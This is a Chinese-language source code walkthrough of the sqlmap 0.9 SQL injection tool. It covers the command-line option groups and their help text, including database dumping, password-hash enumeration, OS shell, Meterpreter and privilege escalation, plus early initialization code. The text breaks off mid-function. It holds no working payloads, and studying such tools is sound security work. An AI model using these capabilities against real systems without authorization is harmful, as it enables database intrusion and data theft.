SqlMap源代码阅读分析
sqlmap 源码分析(一)开始、参数解析
sqlmap是web狗永远也绕不过去的神器,为了能自由的使用sqlmap,阅读源码还是有必要的…
基本配置
sqlmap在启动前,首先是基本的配置
paths.SQLMAP_ROOT_PATH = modulePath()
setPaths()
banner()
设置了和路径有关的配置参数,banner则是输出了sqlmap的信息
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
参数解析
紧接着是对参数的解析
cmdLineOptions.update(cmdLineParser().__dict__)
跟着cmdLineParser我们进入了
from lib.parse.cmdline import cmdLineParser
/lib/parse/cmdline
必选参数
# Target options
target = OptionGroup(parser, "Target", "At least one of these "
"options has to be specified to set the source "
"to get target urls from.")
target.add_option("-d", dest="direct", help="Direct "
"connection to the database")
target.add_option("-u", "--url", dest="url", help="Target url")
target.add_option("-l", dest="list", help="Parse targets from Burp "
"or WebScarab proxy logs")
target.add_option("-r", dest="requestFile",
help="Load HTTP request from a file")
target.add_option("-g", dest="googleDork",
help="Process Google dork results as target urls")
target.add_option("-c", dest="configFile",
help="Load options from a configuration INI file")
从–help上看到是这样的
Target:
At least one of these options has to be specified to set the source to
get target urls from.
-d DIRECT Direct connection to the database
-u URL, --url=URL Target url
-l LIST Parse targets from Burp or WebScarab proxy logs
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target urls
-c CONFIGFILE Load options from a configuration INI file
- -d direct 直连数据库的方式
- -u url 目标url
- -l list 从Burp or WebScarab获取的代理log
- -r 加载从文件获取的http request
- -g 目标url在Process Google dork的结果
- -c 加载ini文件设置
request参数
# Request options
request = OptionGroup(parser, "Request", "These options can be used "
"to specify how to connect to the target url.")
request.add_option("--data", dest="data",
help="Data string to be sent through POST")
request.add_option("--cookie", dest="cookie",
help="HTTP Cookie header")
request.add_option("--cookie-urlencode", dest="cookieUrlencode",
action="store_true", default=False,
help="URL Encode generated cookie injections")
request.add_option("--drop-set-cookie", dest="dropSetCookie",
action="store_true", default=False,
help="Ignore Set-Cookie header from response")
request.add_option("--user-agent", dest="agent",
help="HTTP User-Agent header")
request.add_option("--random-agent", dest="randomAgent",
action="store_true", default=False,
help="Use randomly selected HTTP User-Agent header")
request.add_option("--referer", dest="referer",
help="HTTP Referer header")
request.add_option("--headers", dest="headers",
help="Extra HTTP headers newline separated")
request.add_option("--auth-type", dest="aType",
help="HTTP authentication type "
"(Basic, Digest or NTLM)")
request.add_option("--auth-cred", dest="aCred",
help="HTTP authentication credentials "
"(name:password)")
request.add_option("--auth-cert", dest="aCert",
help="HTTP authentication certificate ("
"key_file,cert_file)")
request.add_option("--proxy", dest="proxy",
help="Use a HTTP proxy to connect to the target url")
request.add_option("--proxy-cred", dest="pCred",
help="HTTP proxy authentication credentials "
"(name:password)")
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
default=False, help="Ignore system default HTTP proxy")
request.add_option("--delay", dest="delay", type="float", default=0,
help="Delay in seconds between each HTTP request")
request.add_option("--timeout", dest="timeout", type="float", default=30,
help="Seconds to wait before timeout connection "
"(default 30)")
request.add_option("--retries", dest="retries", type="int", default=3,
help="Retries when the connection timeouts "
"(default 3)")
request.add_option("--scope", dest="scope",
help="Regexp to filter targets from provided proxy log")
request.add_option("--safe-url", dest="safUrl",
help="Url address to visit frequently during testing")
request.add_option("--safe-freq", dest="saFreq", type="int", default=0,
help="Test requests between two visits to a given safe url")
从–help中看是这样的
Request:
These options can be used to specify how to connect to the target url.
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--cookie-urlencode URL Encode generated cookie injections
--drop-set-cookie Ignore Set-Cookie header from response
--user-agent=AGENT HTTP User-Agent header
--random-agent Use randomly selected HTTP User-Agent header
--referer=REFERER HTTP Referer header
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
--auth-cred=ACRED HTTP authentication credentials (name:password)
--auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)
--proxy=PROXY Use a HTTP proxy to connect to the target url
--proxy-cred=PCRED HTTP proxy authentication credentials (name:password)
--ignore-proxy Ignore system default HTTP proxy
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
--retries=RETRIES Retries when the connection timeouts (default 3)
--scope=SCOPE Regexp to filter targets from provided proxy log
--safe-url=SAFURL Url address to visit frequently during testing
--safe-freq=SAFREQ Test requests between two visits to a given safe url
- –data 很好理解,就是post的时候的数据
- –cookie 请求的时候所带的cookie
- –cookie-urlencode url编码的cookie注入
- –drop-set-cookie 忽略返回头中的set-cookie
- –user-agent=AGENT http头中,关于ua的设置
- –random-agent 更简单的方式,随机使用ua
- –referer=REFERER http头中,关于referer的设置
- –headers=HEADERS 额外的http请求头,要求换行符分割
- –auth-type=ATYPE http authentication的类型(Basic, Digest 和 NTLM)
- –auth-cred=ACRED 如果是账号密码的形式(name:password)
- –auth-cert=ACERT 如果是公私钥的方式,则要求(key_file,cert_file)
- –proxy=PROXY 使用http的代理来连接目标url
- –proxy-cred=PCRED 如果是待用户验证的代理,你需要加上账号密码(name:password)
- –ignore-proxy 忽略系统默认的http代理
- –delay=DELAY 每次请求的延迟,单位为秒
- –timeout=TIMEOUT 请求超时的判定,默认为30
- –retries=RETRIES 请求超时的重试次数,默认为3次
- –scope=SCOPE 从提供的代理日志过滤目标
- –safe-url=SAFURL 经常访问用来测试的url地址
- –safe-freq=SAFREQ 2个访问者的安全链接
性能参数
# Optimization options
optimization = OptionGroup(parser, "Optimization", "These "
"options can be used to optimize the "
"performance of sqlmap.")
optimization.add_option("-o", dest="optimize",
action="store_true", default=False,
help="Turn on all optimization switches")
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
default=False, help="Predict common queries output")
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
default=False, help="Use persistent HTTP(s) connections")
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
default=False, help="Retrieve page length without actual HTTP response body")
optimization.add_option("--threads", dest="threads", type="int", default=1,
help="Max number of concurrent HTTP(s) "
"requests (default 1)")
从–help中看是这样的
Optimization:
These options can be used to optimize the performance of sqlmap.
-o Turn on all optimization switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual HTTP response body
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
- -o 打开所有优化开关
- –predict-output 预测常用的查询输出
- –keep-alive 使用一个持续的http连接
- –null-connection 检索页面长度没有实际的HTTP响应页面
- –threads=THREADS 最大的http连接线程数
注入参数
# Injection options
injection = OptionGroup(parser, "Injection", "These options can be "
"used to specify which parameters to test "
"for, provide custom injection payloads and "
"optional tampering scripts.")
injection.add_option("-p", dest="testParameter",
help="Testable parameter(s)")
injection.add_option("--dbms", dest="dbms",
help="Force back-end DBMS to this value")
injection.add_option("--os", dest="os",
help="Force back-end DBMS operating system "
"to this value")
injection.add_option("--prefix", dest="prefix",
help="Injection payload prefix string")
injection.add_option("--suffix", dest="suffix",
help="Injection payload suffix string")
injection.add_option("--tamper", dest="tamper",
help="Use given script(s) for tampering injection data")
从–help中看是这样的
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts.
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value
--os=OS Force back-end DBMS operating system to this value
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
这个参数是用来配置自定义的注入payload和可以篡改的脚本
- -p TESTPARAMETER 可测试的参数
- –dbms=DBMS 后端数据库的的值(?)
- –os=OS 后端数据库的操作系统
- –prefix=PREFIX 注入payload的前缀字符串
- –suffix=SUFFIX 注入payload的后缀字符串
- –tamper=TAMPER 使用给定的脚本篡改注入数据
盲注参数
# Detection options
detection = OptionGroup(parser, "Detection", "These options can be "
"used to specify how to parse "
"and compare page content from "
"HTTP responses when using blind SQL "
"injection technique.")
detection.add_option("--level", dest="level", default=1, type="int",
help="Level of tests to perform (1-5, "
"default 1)")
detection.add_option("--risk", dest="risk", default=1, type="int",
help="Risk of tests to perform (0-3, "
"default 1)")
detection.add_option("--string", dest="string",
help="String to match in page when the "
"query is valid")
detection.add_option("--regexp", dest="regexp",
help="Regexp to match in page when the "
"query is valid")
detection.add_option("--text-only", dest="textOnly",
action="store_true", default=False,
help="Compare pages based only on the textual content")
从–help中看,是这样的
Detection:
These options can be used to specify how to parse and compare page
content from HTTP responses when using blind SQL injection technique.
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (0-3, default 1)
--string=STRING String to match in page when the query is valid
--regexp=REGEXP Regexp to match in page when the query is valid
--text-only Compare pages based only on the textual content
这部分的参数是在盲注的方式下,指定如何解析页面和比较页面的
- –level 要进行测试的等级,默认为1
- –risk 要进行测试的风险级别,默认为1
- –string 字符串匹配时查询是有效的
- –regexp 正则匹配时查询是有效的
- –text-only 页面只基于文本进行比较
技术参数
# Techniques options
techniques = OptionGroup(parser, "Techniques", "These options can be "
"used to tweak testing of specific SQL "
"injection techniques.")
techniques.add_option("--technique", dest="tech", default="BEUST",
help="SQL injection techniques to test for "
"(default BEUST)")
techniques.add_option("--time-sec", dest="timeSec",
type="int", default=TIME_DEFAULT_DELAY,
help="Seconds to delay the DBMS response "
"(default 5)")
techniques.add_option("--union-cols", dest="uCols",
help="Range of columns to test for UNION query SQL injection")
techniques.add_option("--union-char", dest="uChar",
help="Character to use for bruteforcing number of columns")
在–help中
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques.
--technique=TECH SQL injection techniques to test for (default BEUST)
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
--union-cols=UCOLS Range of columns to test for UNION query SQL injection
--union-char=UCHAR Character to use for bruteforcing number of columns
这部分参数负责调整注入测试时的技术
- –technique=TECH sql注入技术,默认为beust
- –time-sec=TIMESEC 数据库返回延迟,默认为5(应该是时间盲注时候的配置)
- –union-cols=UCOLS 联合查询是的列数
- –union-char=UCHAR 字符用于爆破的列数(union注入的列数测试?)
指纹选项
# Fingerprint options
fingerprint = OptionGroup(parser, "Fingerprint")
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp",
action="store_true", default=False,
help="Perform an extensive DBMS version fingerprint")
Fingerprint:
-f, --fingerprint Perform an extensive DBMS version fingerprint
这个参数只有一个选项,是指明数据库版本的指纹(还是bool型…没懂)
枚举选项
应该说也叫目标选项,是一些关于注入的选项,比较核心
# Enumeration options
enumeration = OptionGroup(parser, "Enumeration", "These options can "
"be used to enumerate the back-end database "
"management system information, structure "
"and data contained in the tables. Moreover "
"you can run your own SQL statements.")
enumeration.add_option("-b", "--banner", dest="getBanner",
action="store_true", default=False, help="Retrieve DBMS banner")
enumeration.add_option("--current-user", dest="getCurrentUser",
action="store_true", default=False,
help="Retrieve DBMS current user")
enumeration.add_option("--current-db", dest="getCurrentDb",
action="store_true", default=False,
help="Retrieve DBMS current database")
enumeration.add_option("--is-dba", dest="isDba",
action="store_true", default=False,
help="Detect if the DBMS current user is DBA")
enumeration.add_option("--users", dest="getUsers", action="store_true",
default=False, help="Enumerate DBMS users")
enumeration.add_option("--passwords", dest="getPasswordHashes",
action="store_true", default=False,
help="Enumerate DBMS users password hashes")
enumeration.add_option("--privileges", dest="getPrivileges",
action="store_true", default=False,
help="Enumerate DBMS users privileges")
enumeration.add_option("--roles", dest="getRoles",
action="store_true", default=False,
help="Enumerate DBMS users roles")
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
default=False, help="Enumerate DBMS databases")
enumeration.add_option("--tables", dest="getTables", action="store_true",
default=False, help="Enumerate DBMS database tables")
enumeration.add_option("--columns", dest="getColumns", action="store_true",
default=False, help="Enumerate DBMS database table columns")
enumeration.add_option("--dump", dest="dumpTable", action="store_true",
default=False, help="Dump DBMS database table entries")
enumeration.add_option("--dump-all", dest="dumpAll", action="store_true",
default=False, help="Dump all DBMS databases tables entries")
enumeration.add_option("--search", dest="search", action="store_true",
default=False, help="Search column(s), table(s) and/or database name(s)")
enumeration.add_option("-D", dest="db",
help="DBMS database to enumerate")
enumeration.add_option("-T", dest="tbl",
help="DBMS database table to enumerate")
enumeration.add_option("-C", dest="col",
help="DBMS database table column to enumerate")
enumeration.add_option("-U", dest="user",
help="DBMS user to enumerate")
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs",
action="store_true", default=False,
help="Exclude DBMS system databases when "
"enumerating tables")
enumeration.add_option("--start", dest="limitStart", type="int",
help="First query output entry to retrieve")
enumeration.add_option("--stop", dest="limitStop", type="int",
help="Last query output entry to retrieve")
enumeration.add_option("--first", dest="firstChar", type="int",
help="First query output word character to retrieve")
enumeration.add_option("--last", dest="lastChar", type="int",
help="Last query output word character to retrieve")
enumeration.add_option("--sql-query", dest="query",
help="SQL statement to be executed")
enumeration.add_option("--sql-shell", dest="sqlShell",
action="store_true", default=False,
help="Prompt for an interactive SQL shell")
在–help中是
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
这些选项涉及到sqlmap攻击的数据库目标,还可以执行自己的语句,可以说是sqlmap中最重要的一些参数了。
- -b, –banner 获取数据库的版本信息
- –current-user 获取数据库的用户名
- –current-db 获取数据库名字(当前)
- –is-dba 查看是否是数据库管理员
- –users 列出数据库所有用户
- –passwords 列出数据库所有用户hash
- –privileges 列出所有用户的权限
- –roles 列出所有用户的角色
- –dbs 列出所有数据库
- –tables 列出所有表
- –columns 列出所有列
- –dump -T “” -D “” -C “” #列出指定数据库的表的字段的数据(–dump -T users -D master -C surname)
- –dump-all 列出所有表的数据
- –search 查询列、表、库名
- -D 指定数据库名
- -T 指定表名
- -C 指定列名
- -U 指定用户名
- –exclude-sysdbs 列举表是排除的数据库
- –start=LIMITSTART 第一次查询输出的条目
- –stop=LIMITSTOP 最后一次查询输出的条目
- –first=FIRSTCHAR 第一个查询输出的字符
- –last=LASTCHAR 最后一个查询输出的字符
- –sql-query=QUERY 执行指定的sql语句
- –sql-shell 执行指定的sql命令
爆破参数
# User-defined function options
brute = OptionGroup(parser, "Brute force", "These "
"options can be used to run brute force "
"checks.")
brute.add_option("--common-tables", dest="commonTables", action="store_true",
default=False, help="Check existence of common tables")
brute.add_option("--common-columns", dest="commonColumns", action="store_true",
default=False, help="Check existence of common columns")
在–help中是这样的
Brute force:
These options can be used to run brute force checks.
--common-tables Check existence of common tables
--common-columns Check existence of common columns
这部分主要是选择是否使用爆破
没啥好说的,分别针对表和列
自定义函数参数
# User-defined function options
udf = OptionGroup(parser, "User-defined function injection", "These "
"options can be used to create custom user-defined "
"functions.")
udf.add_option("--udf-inject", dest="udfInject", action="store_true",
default=False, help="Inject custom user-defined functions")
udf.add_option("--shared-lib", dest="shLib",
help="Local path of the shared library")
–help
User-defined function injection:
These options can be used to create custom user-defined functions.
--udf-inject Inject custom user-defined functions
--shared-lib=SHLIB Local path of the shared library
这部分主要是负责自定义函数,你可以通过编译mysql注入你想要的函数,也可以PostgreSQL在windows上共享库、dll,或者在linux上共享对象
- –udf-inject 注入传统的用户自定义函数
- –shared-lib=SHLIB 本地共享的库
文件系统配置
# File system options
filesystem = OptionGroup(parser, "File system access", "These options "
"can be used to access the back-end database "
"management system underlying file system.")
filesystem.add_option("--file-read", dest="rFile",
help="Read a file from the back-end DBMS "
"file system")
filesystem.add_option("--file-write", dest="wFile",
help="Write a local file on the back-end "
"DBMS file system")
filesystem.add_option("--file-dest", dest="dFile",
help="Back-end DBMS absolute filepath to "
"write to")
–help
File system access:
These options can be used to access the back-end database management
system underlying file system.
--file-read=RFILE Read a file from the back-end DBMS file system
--file-write=WFILE Write a local file on the back-end DBMS file system
--file-dest=DFILE Back-end DBMS absolute filepath to write to
这些参数用来配置后端数据库管理的文件系统
- –file-read 读文件
- –file-write 写文件
- –file-dest 绝对路径写文件
操作系统参数
# Takeover options
takeover = OptionGroup(parser, "Operating system access", "These "
"options can be used to access the back-end "
"database management system underlying "
"operating system.")
takeover.add_option("--os-cmd", dest="osCmd",
help="Execute an operating system command")
takeover.add_option("--os-shell", dest="osShell",
action="store_true", default=False,
help="Prompt for an interactive operating "
"system shell")
takeover.add_option("--os-pwn", dest="osPwn",
action="store_true", default=False,
help="Prompt for an out-of-band shell, "
"meterpreter or VNC")
takeover.add_option("--os-smbrelay", dest="osSmb",
action="store_true", default=False,
help="One click prompt for an OOB shell, "
"meterpreter or VNC")
takeover.add_option("--os-bof", dest="osBof",
action="store_true", default=False,
help="Stored procedure buffer overflow "
"exploitation")
takeover.add_option("--priv-esc", dest="privEsc",
action="store_true", default=False,
help="Database process' user privilege escalation")
takeover.add_option("--msf-path", dest="msfPath",
help="Local path where Metasploit Framework 3 "
"is installed")
takeover.add_option("--tmp-path", dest="tmpPath",
help="Remote absolute path of temporary files "
"directory")
–help
Operating system access:
These options can be used to access the back-end database management
system underlying operating system.
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
这部分的参数主要是用于对数据库后端的操作系统的惭怍
- –os-cmd=OSCMD 执行一个操作系统的shell
- –os-shell 提供一个交互式的shell
- –os-pwn 提供一个shell, meterpreter or VNC
- –os-smbrelay 提供一个an OOB shell, meterpreter or VNC
- –os-bof 使用一个缓冲区溢出
- –priv-esc 数据库进程提权
- –msf-path=MSFPATH 本地Metasploit的安装路径
- –tmp-path=TMPPATH 远程临时文件目录的绝对路径
windows注册表参数
# Windows registry options
windows = OptionGroup(parser, "Windows registry access", "These "
"options can be used to access the back-end "
"database management system Windows "
"registry.")
windows.add_option("--reg-read", dest="regRead",
action="store_true", default=False,
help="Read a Windows registry key value")
windows.add_option("--reg-add", dest="regAdd",
action="store_true", default=False,
help="Write a Windows registry key value data")
windows.add_option("--reg-del", dest="regDel",
action="store_true", default=False,
help="Delete a Windows registry key value")
windows.add_option("--reg-key", dest="regKey",
help="Windows registry key")
windows.add_option("--reg-value", dest="regVal",
help="Windows registry key value")
windows.add_option("--reg-data", dest="regData",
help="Windows registry key value data")
windows.add_option("--reg-type", dest="regType",
help="Windows registry key value type")
–help
Windows registry access:
These options can be used to access the back-end database management
system Windows registry.
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
这个参数主要是用来针对后端数据库操作系统的windows注册表
- –reg-read 读注册表的键值
- –reg-add 添加注册表的键值
- –reg-del 删除注册表的键值
- –reg-key=REGKEY windows注册表的键
- –reg-value=REGVAL windows注册表的键值
- –reg-data=REGDATA windows注册表的键值数据
- –reg-type=REGTYPE windows注册表的键值类型
一般工作参数
# General options
general = OptionGroup(parser, "General", "These options can be used "
"to set some general working parameters. " )
#general.add_option("-x", dest="xmlFile",
# help="Dump the data into an XML file")
general.add_option("-t", dest="trafficFile",
help="Log all HTTP traffic into a "
"textual file")
general.add_option("-s", dest="sessionFile",
help="Save and resume all data retrieved "
"on a session file")
general.add_option("--flush-session", dest="flushSession",
action="store_true", default=False,
help="Flush session file for current target")
general.add_option("--fresh-queries", dest="freshQueries",
action="store_true", default=False,
help="Ignores query results stored in session file")
general.add_option("--eta", dest="eta",
action="store_true", default=False,
help="Display for each output the "
"estimated time of arrival")
general.add_option("--update", dest="updateAll",
action="store_true", default=False,
help="Update sqlmap")
general.add_option("--save", dest="saveCmdline",
action="store_true", default=False,
help="Save options on a configuration INI file")
general.add_option("--batch", dest="batch",
action="store_true", default=False,
help="Never ask for user input, use the default behaviour")
–help
General:
These options can be used to set some general working parameters.
-t TRAFFICFILE Log all HTTP traffic into a textual file
-s SESSIONFILE Save and resume all data retrieved on a session file
--flush-session Flush session file for current target
--fresh-queries Ignores query results stored in session file
--eta Display for each output the estimated time of arrival
--update Update sqlmap
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
这部分选项是用来设置某些一般的工作参数。
- -t TRAFFICFILE 记录所有的http流量到一个文本文件
- -s SESSIONFILE 保存和恢复所有的数据到一个session文件
- –flush-session 对于当前的目标刷新已有的session
- –fresh-queries 忽略查询结果中已有的结果
- –eta 预计每个输出的显示时间
- –update 更新sqlmap
- –save 保存配置文件的ini文件
- –batch 使用默认的行为
杂项配置
# Miscellaneous options
miscellaneous = OptionGroup(parser, "Miscellaneous")
miscellaneous.add_option("--beep", dest="beep",
action="store_true", default=False,
help="Alert when sql injection found")
miscellaneous.add_option("--check-payload", dest="checkPayload",
action="store_true", default=False,
help="IDS detection testing of injection payloads")
miscellaneous.add_option("--cleanup", dest="cleanup",
action="store_true", default=False,
help="Clean up the DBMS by sqlmap specific "
"UDF and tables")
miscellaneous.add_option("--forms", dest="forms",
action="store_true", default=False,
help="Parse and test forms on target url")
miscellaneous.add_option("--gpage", dest="googlePage", type="int",
help="Use Google dork results from specified page number")
miscellaneous.add_option("--page-rank", dest="pageRank",
action="store_true", default=False,
help="Display page rank (PR) for Google dork results")
miscellaneous.add_option("--parse-errors", dest="parseErrors",
action="store_true", default=False,
help="Parse DBMS error messages from response pages")
miscellaneous.add_option("--replicate", dest="replicate",
action="store_true", default=False,
help="Replicate dumped data into a sqlite3 database")
miscellaneous.add_option("--tor", dest="tor",
action="store_true", default=False,
help="Use default Tor (Vidalia/Privoxy/Polipo) proxy address")
miscellaneous.add_option("--wizard", dest="wizard",
action="store_true", default=False,
help="Simple wizard interface for beginner users")
–help
Miscellaneous:
--beep Alert when sql injection found
--check-payload IDS detection testing of injection payloads
--cleanup Clean up the DBMS by sqlmap specific UDF and tables
--forms Parse and test forms on target url
--gpage=GOOGLEPAGE Use Google dork results from specified page number
--page-rank Display page rank (PR) for Google dork results
--parse-errors Parse DBMS error messages from response pages
--replicate Replicate dumped data into a sqlite3 database
--tor Use default Tor (Vidalia/Privoxy/Polipo) proxy address
--wizard Simple wizard interface for beginner users
这里剩下的是一些杂项配置
- –beep 当发现注入时弹窗出来
- –check-payload IDS检测注入payload
- –cleanup 清理sqlmap特定的UDF和表
- –forms 解析和测试你的目标url
- –gpage=GOOGLEPAGE 使用Google dork指定结果页数
- –page-rank 显示google dork的排名结果
- –parse-errors 从页面解析数据库的错误信息
- –replicate 复制数据到sqlite3
- –tor 使用默认的代理地址
- –wizard 为新手配置简单的页面
初始化
try:
init(cmdLineOptions)
if conf.profile:
profile()
elif conf.smokeTest:
smokeTest()
elif conf.liveTest:
liveTest()
else:
start()
从这里开始就是正式开始解析sqlmap的参数,执行相应的函数了
sqlmap 源码分析(二)初始化
初始化
参数解析完后,开始初始化
init(cmdLineOptions)
这一部分主要是根据之前的参数,设置属性和很多基于命令行和配置文件的选项
初始化一些必要的配置属性
debugMsg = "initializing the configuration"
logger.debug(debugMsg)
conf.boundaries = []
conf.cj = None
conf.dbmsConnector = None
conf.dbmsHandler = None
conf.dumpPath = None
conf.httpHeaders = []
conf.hostname = None
conf.loggedToOut = None
conf.multipleTargets = False
conf.outputPath = None
conf.paramDict = {}
conf.parameters = {}
conf.path = None
conf.port = None
conf.redirectHandled = False
conf.scheme = None
conf.sessionFP = None
conf.start = True
conf.tests = []
conf.trafficFP = None
conf.wFileType = None
后面也相同__setKnowledgeBaseAttributes()
初始化了一些有关知识库配置的参数
然后是配置文件的初始化__mergeOptions(inputOptions, overrideOptions)
新手引导
在分析参数的时候有一个叫做wizard的参数,是关于新手引导的,如果开启就会进入引导页面
def __useWizardInterface():
"""
Presents simple wizard interface for beginner users
"""
if not conf.wizard:
return
logger.info("starting wizard interface")
while not conf.url:
message = "Please enter full target URL (-u): "
conf.url = readInput(message, default=None)
message = "POST data (--data) [Enter for None]: "
conf.data = readInput(message, default=None)
choice = None
while choice is None or choice not in ("", "1", "2", "3"):
message = "Injection difficulty (--level/--risk). Please choose:\n"
message += "[1] Normal (default)\n[2] Medium\n[3] Hard"
choice = readInput(message, default='1')
if choice == '2':
conf.risk = 2
conf.level = 3
elif choice == '3':
conf.risk = 3
conf.level = 5
else:
conf.risk = 1
conf.level = 1
choice = None
while choice is None or choice not in ("", "1", "2", "3"):
message = "Enumeration (--banner/--current-user/etc). Please choose:\n"
message += "[1] Basic (default)\n[2] Smart\n[3] All"
choice = readInput(message, default='1')
if choice == '2':
map(lambda x: conf.__setitem__(x, True), ['getBanner', 'getCurrentUser', 'getCurrentDb', 'isDba', 'getUsers', 'getDbs', 'getTables', 'excludeSysDbs'])
elif choice == '3':
map(lambda x: conf.__setitem__(x, True), ['getBanner', 'getCurrentUser', 'getCurrentDb', 'isDba', 'getUsers', 'getPasswordHashes', 'getPrivileges', 'getRoles', 'dumpAll'])
else:
map(lambda x: conf.__setitem__(x, True), ['getBanner', 'getCurrentUser', 'getCurrentDb', 'isDba'])
conf.batch = True
conf.threads = 4
logger.debug("muting sqlmap.. it will do the magic for you")
conf.verbose = 0
dataToStdout("\nsqlmap is running, please wait..\n\n")
从输入目标url
–>post数据
–>选择注入级别
–>注入目标的选择
–>配置完毕
设置输出log级别
__setVerbosity():
这里主要是设置了一些输出的log级别,在logger的基本设置上,sqlmap还拓展到了8级
def __setVerbosity():
"""
This function set the verbosity of sqlmap output messages.
"""
if conf.verbose is None:
conf.verbose = 1
conf.verbose = int(conf.verbose)
if conf.verbose == 0:
logger.setLevel(logging.ERROR)
elif conf.verbose == 1:
logger.setLevel(logging.INFO)
elif conf.verbose > 2 and conf.eta:
conf.verbose = 2
logger.setLevel(logging.DEBUG)
elif conf.verbose == 2:
logger.setLevel(logging.DEBUG)
elif conf.verbose == 3:
logger.setLevel(9)
elif conf.verbose == 4:
logger.setLevel(8)
elif conf.verbose >= 5:
logger.setLevel(7)
保存命令行的配置到ini文件
当然,和前面的新手引导类似,这是需要额外参数才会进行的配置
__saveCmdline
def __saveCmdline():
"""
Saves the command line options on a sqlmap configuration INI file
Format.
"""
if not conf.saveCmdline:
return
debugMsg = "saving command line options on a sqlmap configuration INI file"
logger.debug(debugMsg)
config = UnicodeRawConfigParser()
userOpts = {}
for family in optDict.keys():
userOpts[family] = []
for option, value in conf.items():
for family, optionData in optDict.items():
if option in optionData:
userOpts[family].append((option, value, optionData[option]))
for family, optionData in userOpts.items():
config.add_section(family)
optionData.sort()
for option, value, datatype in optionData:
if isinstance(datatype, (list, tuple, set)):
datatype = datatype[0]
if value is None:
if datatype == "boolean":
value = "False"
elif datatype in ( "integer", "float" ):
if option in ( "threads", "verbose" ):
value = "1"
elif option == "timeout":
value = "10"
else:
value = "0"
elif datatype == "string":
value = ""
if isinstance(value, basestring):
value = value.replace("\n", "\n ")
config.set(family, option, value)
confFP = openFile(paths.SQLMAP_CONFIG, "wb")
config.write(confFP)
infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
logger.info(infoMsg)
这里设置了默认的线程数,log日志级别、延时等等…并将其储存到了设定好的sqlmap_config目录中。
处理从文件获取的http请求
__setRequestFromFile():
def __setRequestFromFile():
"""
This function checks if the way to make a HTTP request is through supplied
textual file, parses it and saves the information into the knowledge base.
"""
if not conf.requestFile:
return
addedTargetUrls = set()
conf.requestFile = os.path.expanduser(conf.requestFile)
infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
logger.info(infoMsg)
if not os.path.isfile(conf.requestFile):
errMsg = "the specified HTTP request file "
errMsg += "does not exist"
raise sqlmapFilePathException, errMsg
__feedTargetsDict(conf.requestFile, addedTargetUrls)
这里读取了conf.requestFile的内容初始化完成,然后开始处理文件内容
__feedTargetsDict(conf.requestFile, addedTargetUrls)
读取文件
fp = openFile(reqFile, "rb")
content = fp.read()
content = content.replace("\r", "")
if conf.scope:
logger.info("using regular expression '%s' for filtering targets" % conf.scope)
开始解包
__parseBurpLog(content)
__parseWebScarabLog(content)
先是一些基本的处理和判断
url = extractRegexResult(r"URL: (?P<result>.+?)\n", request, re.I)
method = extractRegexResult(r"METHOD: (?P<result>.+?)\n", request, re.I)
cookie = extractRegexResult(r"COOKIE: (?P<result>.+?)\n", request, re.I)
getPostReq = True
if not method or not url:
logger.debug("Invalid log data")
continue
然后指明分析log文件是不支持post请求的
if method.upper() == "POST":
warnMsg = "POST requests from WebScarab logs aren't supported "
warnMsg += "as their body content is stored in separate files. "
warnMsg += "Nevertheless you can use -r to load them individually."
logger.warning(warnMsg)
continue
开始解包__parseWebScarabLog(content)
分割出数据传输方式以及端口号
if scheme is None:
